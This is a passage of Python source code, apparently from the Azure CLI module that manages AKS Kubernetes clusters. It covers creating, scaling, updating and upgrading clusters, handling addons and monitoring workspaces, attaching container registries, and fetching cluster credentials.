api_server_access_profile = None
if enable_private_cluster and load_balancer_sku.lower() != "standard":
raise CLIError("Please use standard load balancer for private cluster")
if api_server_authorized_ip_ranges or enable_private_cluster:
api_server_access_profile = _populate_api_server_access_profile(
api_server_authorized_ip_ranges,
enable_private_cluster=enable_private_cluster
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')
identity = None
if enable_managed_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
mc = ManagedCluster(
location=location,
tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=not disable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
api_server_access_profile=api_server_access_profile,
identity=identity
)
if uptime_sla:
mc.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
# Add AAD session key to header.
# If principal_obj is None, we will not add this header, this can happen
# when the cluster enables managed identity. In this case, the header is useless
# and that's OK to not add this header
custom_headers = None
if principal_obj:
custom_headers = {'Ocp-Aad-Session-Key': principal_obj.get("aad_session_key")}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
need_pull_for_result = monitoring or (enable_managed_identity and attach_acr)
if need_pull_for_result:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc))
else:
result = sdk_no_wait(no_wait,
client.create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc,
custom_headers=custom_headers)
if monitoring:
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if enable_managed_identity and attach_acr:
if result.identity_profile is None or result.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach acr to it, '
'you can manually grant permission to the identity named <ClUSTER_NAME>-agentpool '
'in MC_ resource group to give it permission to pull from ACR.')
else:
kubelet_identity_client_id = result.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
return result
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable=True,
workspace_resource_id=workspace_resource_id, subnet_name=subnet_name, no_wait=no_wait)
if 'omsagent' in instance.addon_profiles and instance.addon_profiles['omsagent'].enabled:
_ensure_container_insights_for_monitoring(cmd, instance.addon_profiles['omsagent'])
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
else:
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name, name, instance)
return result
def aks_get_versions(cmd, client, location):
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
overwrite_existing=False, context_name=None):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(resource_group_name, name)
else:
credentialResults = client.list_cluster_user_credentials(resource_group_name, name)
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8')
_print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
ADDONS = {
'http_application_routing': 'httpApplicationRouting',
'monitoring': 'omsagent',
'virtual-node': 'aciConnector',
'kube-dashboard': 'kubeDashboard'
}
def aks_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_nulls(list(managed_clusters))
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def aks_update_credentials(cmd, client, resource_group_name, name,
reset_service_principal=False,
reset_aad=False,
service_principal=None,
client_secret=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_client_app_id=None,
aad_tenant_id=None,
no_wait=False):
if bool(reset_service_principal) == bool(reset_aad):
raise CLIError('usage error: --reset-service-principal | --reset-aad-profile')
if reset_service_principal:
if service_principal is None or client_secret is None:
raise CLIError('usage error: --reset-service-principal --service-principal ID --client-secret SECRET')
return sdk_no_wait(no_wait,
client.reset_service_principal_profile,
resource_group_name,
name, service_principal, client_secret)
if not all([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('usage error: --reset-aad --aad-client-app-id ID --aad-server-app-id ID '
'--aad-server-app-secret SECRET [--aad-tenant-id ID]')
parameters = {
'clientAppID': aad_client_app_id,
'serverAppID': aad_server_app_id,
'serverAppSecret': aad_server_app_secret,
'tenantID': aad_tenant_id
}
return sdk_no_wait(no_wait,
client.reset_aad_profile,
resource_group_name,
name, parameters)
def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There are more than one node pool in the cluster. '
'Please specify nodepool name or use az aks nodepool command to scale node pool')
if node_count == 0:
raise CLIError("Can't scale down to 0 nodes.")
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
# pylint: disable=inconsistent-return-statements
def aks_update(cmd, client, resource_group_name, name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
attach_acr=None,
detach_acr=None,
api_server_authorized_ip_ranges=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
if (update_autoscaler != 1 and not update_lb_profile and
not attach_acr and
not detach_acr and
api_server_authorized_ip_ranges is None):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--load-balancer-managed-outbound-ip-count" or'
'"--load-balancer-outbound-ips" or '
'"--load-balancer-outbound-ip-prefixes" or'
'"--load-balancer-outbound-ports" or'
'"--load-balancer-idle-timeout" or'
'"--attach-acr" or "--dettach-acr" or'
'"--"api-server-authorized-ip-ranges')
instance = client.get(resource_group_name, name)
# For multi-agent pool, use the az aks nodepool command
if update_autoscaler > 0 and len(instance.agent_pool_profiles) > 1:
raise CLIError('There are more than one node pool in the cluster. Please use "az aks nodepool" command '
'to update per node pool auto scaler settings')
node_count = instance.agent_pool_profiles[0].count
_validate_autoscaler_update_counts(min_count, max_count, node_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this node pool.\n'
'Please run "az aks --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already disabled for this node pool.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = ""
if instance.identity is not None and instance.identity.type == "SystemAssigned":
if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
'Please do not set --attach-acr or --detach-acr. '
'You can manually grant or revoke permission to the identity named '
'<ClUSTER_NAME>-agentpool in MC_ resource group to access ACR.')
client_id = instance.identity_profile["kubeletidentity"].client_id
else:
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
if update_lb_profile:
instance.network_profile.load_balancer_profile = update_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout,
instance.network_profile.load_balancer_profile)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(api_server_authorized_ip_ranges, instance=instance)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
# pylint: disable=unused-argument,inconsistent-return-statements
def aks_upgrade(cmd, client, resource_group_name, name, kubernetes_version, control_plane_only=False,
no_wait=False, **kwargs):
instance = client.get(resource_group_name, name)
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
DEV_SPACES_EXTENSION_NAME = 'dev-spaces'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces.custom'
def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None,
endpoint_type='Public', prompt=False):
"""
Use Azure Dev Spaces with a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param update: Update to the latest Azure Dev Spaces client components.
:type update: bool
:param space_name: Name of the new or existing dev space to select. Defaults to an \
interactive selection experience.
:type space_name: String
:param endpoint_type: The endpoint type to be used for a Azure Dev Spaces controller. \
See https://aka.ms/azds-networking for more information.
:type endpoint_type: String
:param prompt: Do not prompt for confirmation. Requires --space.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_use_dev_spaces(name, resource_group_name, update, space_name, endpoint_type, prompt)
except TypeError:
raise CLIError("Use '--update' option to get the latest Azure Dev Spaces client components.")
except AttributeError as ae:
raise CLIError(ae)
def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
"""
Remove Azure Dev Spaces from a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param prompt: Do not prompt for confirmation.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_remove_dev_spaces(name, resource_group_name, prompt)
except AttributeError as ae:
raise CLIError(ae)
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):
return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable, workspace_resource_id=None,
subnet_name=None, no_wait=False):
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
if 'kube-dashboard' in addon_args and 'kubeDashboard' not in addon_profiles:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
addon = ADDONS[addon_arg]
if addon == 'aciConnector':
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# addon name is case insensitive
addon = next((x for x in addon_profiles.keys() if x.lower() == addon.lower()), addon)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == 'omsagent':
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {'logAnalyticsWorkspaceResourceID': workspace_resource_id}
elif addon.lower() == ('aciConnector' + os_type).lower():
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError('The aci-connector addon requires setting a subnet name.')
addon_profile.config = {'SubnetName': subnet_name}
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
raise CLIError("The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles['httpApplicationRouting'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles['omsagent'] = ManagedClusterAddonProfile(
enabled=True, config={'logAnalyticsWorkspaceResourceID': workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _install_dev_spaces_extension(cmd, extension_name):
try:
from azure.cli.core.extension import operations
operations.add_extension(cmd=cmd, extension_name=extension_name)
except Exception: # nopa pylint: disable=broad-except
return False
return True
def _update_dev_spaces_extension(cmd, extension_name, extension_module):
from azure.cli.core.extension import ExtensionNotInstalledException
try:
from azure.cli.core.extension import operations
operations.update_extension(cmd=cmd, extension_name=extension_name)
operations.reload_extension(extension_name=extension_name)
except CLIError as err:
logger.info(err)
except ExtensionNotInstalledException as err:
logger.debug(err)
return False
except ModuleNotFoundError as err:
logger.debug(err)
logger.error("Error occurred attempting to load the extension module. Use --debug for more information.")
return False
return True
def _get_or_add_extension(cmd, extension_name, extension_module, update=False):
from azure.cli.core.extension import (ExtensionNotInstalledException, get_extension)
try:
get_extension(extension_name)
if update:
return _update_dev_spaces_extension(cmd, extension_name, extension_module)
except ExtensionNotInstalledException:
return _install_dev_spaces_extension(cmd, extension_name)
return True
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "southcentralus",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "eastus",
"northeurope": "northeurope",
"southafricanorth": "westeurope",
"southafricawest": "westeurope",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "uksouth",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2"
}
# mapping for azure china cloud
# currently log analytics supported only China East 2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
# mapping for azure us governmner cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
workspace_region = "eastus"
workspace_region_code = "EUS"
# sanity check that locations and clouds match.
if ((cloud_name.lower() == 'azurecloud' and AzureChinaRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurecloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurecloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azurechinacloud' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurechinacloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurechinacloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azureusgovernment' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azureusgovernment' and AzureChinaRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azureusgovernment) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(workspace_region, "USGV")
else:
logger.error("AKS Monitoring addon not supported in cloud : %s", cloud_name)
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})
default_workspace_params = {
'location': workspace_region,
'properties': {
'sku': {
'name': 'standalone'
}
}
}
async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
default_workspace_params)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
# Workaround for this addon key which has been seen lowercased in the wild.
if 'loganalyticsworkspaceresourceid' in addon.config:
addon.config['logAnalyticsWorkspaceResourceID'] = addon.config.pop('loganalyticsworkspaceresourceid')
workspace_resource_id = addon.config['logAnalyticsWorkspaceResourceID']
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError('Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd.cli_ctx, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id,
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
# Check if the ACR exists by name accross all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def aks_agentpool_show(cmd, client, resource_group_name, cluster_name, nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, client, resource_group_name, cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, client, resource_group_name, cluster_name, nodepool_name,
kubernetes_version=None,
zones=None,
enable_node_public_ip=False,
node_vm_size=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
max_pods=0,
os_type="Linux",
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
tags=None,
labels=None,
mode="User",
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
